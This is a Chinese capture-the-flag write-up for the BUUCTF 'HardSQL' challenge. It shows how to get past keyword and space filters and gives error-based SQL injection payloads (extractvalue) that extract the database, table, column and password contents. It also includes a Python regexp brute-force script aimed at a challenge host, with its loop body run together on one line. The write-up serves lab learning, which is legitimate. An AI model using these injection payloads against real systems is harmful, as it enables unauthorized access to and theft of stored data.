BUU26 [极客大挑战 2019]HardSQL1

输入一些SQL关键词，发现空格，=，union，and，by都被过滤了

=被过滤，就用like替代 

 

发现登录成功，可以注入

报错注入

注意

1.这里过滤了空格，就用()将内容包裹起来

比如说：select table_name from information_schema.tables

就可以换成：select(table_name)from(information_schema.tables)

2.过滤了=，where(table_name='geek')语句中的 = 就被过滤了，此时可以用 like 代替：

where(table_name)like('geek')

爆库名：

1'or(extractvalue(1,concat(0x7e,(select(database())))))#

爆表名：

1'or(extractvalue(1,concat(0x7e，(select(group_concat(table_name))from(information_schema.tables)where(table_schema

)like('geek')),0x7e)))#

 

爆列名：这里限制条件只用写table_name='H4rDsq1'就行了，因为and被过滤了

这里注意是('H4rDsq1')

1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)

where(table_name)like('H4rDsq1')),0x7e)))#

 爆password：这里就必须写(H4rDsq1)

1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e)))#

但是显示不完整 

发现substr也被过滤了，所以使用right或者regexp

right:

1'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)),0x7e)))#

拼接起来 

regexp:

regexp 是 SQL 中的正则表达式匹配运算符

url地址是直接复制的地址栏的地址，所以存在的都是编码后的字符，其原始语句为：1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)where(password)regexp('^f')),0x7e)))#【筛选出 H4rDsq1 表中 password 字段以 'f' 开头的记录】，可用payload：1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)where(password)regexp('^flag{5e0eabdd-83c3-466f-9e51-bb95d91d23ad}')),0x7e)))#，验证正则匹配方式的正确性，脚本如下：

正则表达式中，^f表示匹配字符串以 f 开头 

import requests  #requests 模块用于发送 HTTP 请求，与目标服务器进行交互。
import time      #time 模块用于添加延迟，避免请求过于频繁导致服务器拒绝。
#去掉了大写字母，可手动加上，ABCDEFGHIJKLMNOPQRSTUVWXYZ
#未写停止判断，当判断到strings最后一位且flag未在其中时停止即可
strings = 'abcdefghijklmnopqrstuvwxyz1234567890{}-_~' #定义了可能出现在 flag 中的字符集
i = 1
flag = ''  #flag 用于存储已经猜测到的部分 flag，初始为空字符串。
while i < 80:for one_char in strings:one_char = flag + one_char#先把已经猜好的和新遍历的字符拼接起来url = "http://4538af48-5b3e-451e-b6bf-565049f2caab.node4.buuoj.cn:81/check.php?username=12&password=1%27or%28extractvalue%281%2Cconcat%280x7e%2C%28select%28password%29from%28H4rDsq1%29where%28password%29regexp%28%27%5E"+str(one_char)+"%27%29%29%2C0x7e%29%29%29%23"#将one_char转换成字符串，以这个新猜的字符串为开头看看能不能匹配上真正的flag#如果能匹配上，它会返回匹配上的flag{xxxxxxxx}#（因为本意是查询有没有符合条件的字符串），所以回显的文本里会有flag字样time.sleep(0.05) #暂停 0.05 秒，避免请求过于频繁。rs = requests.get(url)if 'flag' in rs.text:   #如果响应文本中包含 'flag'，说明当前猜测的部分 flag 是正确的，flag = one_charprint("\r", end="") #\r回车print('flag为：' + flag, end='')break

参考：[极客大挑战 2019]HardSQL-1 - upfine - 博客园